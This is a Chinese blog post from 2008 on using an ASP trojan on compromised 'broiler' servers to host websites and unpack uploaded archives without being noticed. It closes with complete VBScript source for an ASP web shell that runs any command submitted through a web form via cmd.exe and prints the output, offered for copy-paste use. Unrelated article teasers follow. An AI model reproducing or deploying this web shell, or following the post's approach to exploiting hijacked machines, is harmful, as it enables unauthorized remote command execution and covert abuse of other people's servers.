用ASP木马实现FTP和解压缩
发布时间:2008-02-13 08:47:00
我想大家都有一些开了80端口的肉 * ,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉。
在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现。
asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序。我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找。最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?
这下asp木马用上了。找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下。上传.zip或者.rar文件到该肉鸡的web目录。在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录。
只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
<
' -- create the COM objects that we will be using -- '
Set oScript = Server.createObject("WSCRIPT.SHELL")
Set oScriptNet = Server.createObject("WSCRIPT.netWORK")
Set oFileSys = Server.createObject("Scripting.FileSystemObject") <
' -- check for a command that we have posted -- '
szCMD = Request.form(".CMD")
If (szCMD <> "") Then <
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <
End If <
%>
<HTML>
<BODY>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</form>
<PRE> <
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
0
投稿猜你喜欢
一、生产者消费者模型介绍1.1 为什么需要使用生产者消费者模型生产者是指生产数据的任务,消费者是指消费数据的任务。当生产者的生产能力远大于消- 本教程为大家分享了Fly Bird小游戏的制作流程,供大家参考,具体内容如下1.分析页面结构,理清需求和功能游戏有三个界面,分别是开始界面,
- 做开发总得用到数据吧,Linux作为服务器,总得有一个数据库来存储测试用的数据,所以呢,这里附上CentOS6、7安装MySQL5.7的教程
- 本文主要记录了在Nodejs开发过程中遇到过的由数组特性引起的问题及解决方式,以及对数组的灵活应用。本文代码测试结果均基于node v6.9
- 前言亲人工作考试,公司给的题库好像是直接从数据库导出的表格Excel形式,在移动端上非常难看,需要不断左右上下滑动,看不了多少题眼就瞎了,遂
- 写在之前围绕类的话题,说是说不完的,仅在特殊方法,除了我们在前面遇到过的 __init__(),__new__(),__str__() 等之
- 前言首先线程和线程池不管在哪个语言里面,理论都是通用的。对于开发来说,解决高并发问题离不开对多个线程处理。我们先从线程到线程池,从每个线程的
- Python程序可以处理多种方式的日期和时间。日期格式之间的转换是一种常见计算机的杂活。 Python的时间和日历模块,能帮助处
- 定义:Dim MyArray() Redim MyArray(5)Session("StoredAr
- 学习前言在神经网络学习中slim常用函数与如何训练、保存模型文章里已经讲述了如何使用slim训练出来一个模型,这篇文章将会讲述如何预测。载入
- 本文实例为大家分享了python简单实现图片文字分割的具体代码,供大家参考,具体内容如下原图:图片预处理:图片二值化以及图片降噪处理。# 图
- 一般事件事件浏览器支持描述onClickHTML: 2 | 3 | 3.2 |
- Css3引入了新的盒模型——弹性盒模型,该模型决定一个盒子在其他盒子中的分布方式以及如何处理可用的空间。这与XUL(火狐使用的用户交互语言)
- 一 概念介绍Index Condition Pushdown (ICP)是MySQL 5.6 版本中的新特性,是一种在存储引擎层使用索引过滤
- 本文旨在介绍 vue-router 的实现思路,并动手实现一个简化版的 vue-router 。我们先来看一下一般项目中对 vue-rout
- 说起交叉熵损失函数「Cross Entropy Loss」,脑海中立马浮现出它的公式:我们已经对这个交叉熵函数非常熟悉,大多数情况下都是直接
- 协程协程简单来说就是一个更加轻量级的线程,并且不由操作系统内核管理,完全由程序所控制(在用户态执行)。协程在子程序内部是可中断的,然后转而执
- 背景:在自动化化测试过程中,不方便准确获取页面的元素,或者在重构过程中方法修改造成元素层级改变,因此通过设置id准备定位。一、python准
- 书 名:细节决定交互设计的成败国际书号:ISBN 978-7-121-08232-0作 &nb
- Python有大量强大又贴心的特性,如果要列个最受欢迎排行榜,那么装饰器绝对会在其中。初识装饰器,会感觉到优雅且神奇,想亲手实现时却总有距离
